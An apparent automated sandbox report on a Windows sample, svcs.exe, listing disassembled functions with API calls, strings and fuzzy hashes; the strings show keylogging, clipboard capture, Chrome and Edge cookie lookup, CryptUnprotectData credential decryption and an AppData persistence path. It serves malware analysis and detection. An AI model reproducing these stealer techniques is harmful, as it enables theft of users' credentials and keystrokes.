                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\microsofts\svcs.exe,00000104), ref: 00443475
                                • _free.LIBCMT ref: 00443540
                                • _free.LIBCMT ref: 0044354A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                                • API String ID: 2506810119-274596292
                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                • GetLastError.KERNEL32 ref: 0044B931
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: PkGNG
                                • API String ID: 2456169464-263838557
                                • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: 5844705bffbe932e08c9a339546c7ba6e86f4bc1b82537618e6767435229dddb
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B748 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                • API String ID: 1881088180-1379921833
                                • Opcode ID: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: 324d16734c00dd0800ed2bf7710d2d62d1c0e2a3751a5b5203366b445deaa986
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$okmode$PG
                                • API String ID: 3411444782-3370592832
                                • Opcode ID: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: f3a158218bdd67d4c4b1fae7efd00a7e5adabf20f91f0610842615a967fde749
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: 3f8b8350712af9d240db3e3edefbc0b5893a2e7bcab5cac2a7822d9b4b4e7b0e
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                Strings
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: 8e96e49e63ca3bf0ac1f2790d6dd37b6dab53323dba9b7dc4ed1c0216d558f84
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: 3bd749956e3e9a916655ad8ba54339a6dfc039012b8b1fa6949936b121210f93
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                • API String ID: 481472006-3277280411
                                • Opcode ID: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: 978051ae2d71d51f6a46a557316c11cd91a1cbdf249e5825d4a92e87c892c4af
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                • GetLastError.KERNEL32 ref: 0044C296
                                • __dosmaperr.LIBCMT ref: 0044C29D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLastPointer__dosmaperr
                                • String ID: PkGNG
                                • API String ID: 2336955059-263838557
                                • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: 6ba0741fc7cdd8782e8632b0dc009c189a51354901c2dba2396252722e458400
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004017EC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
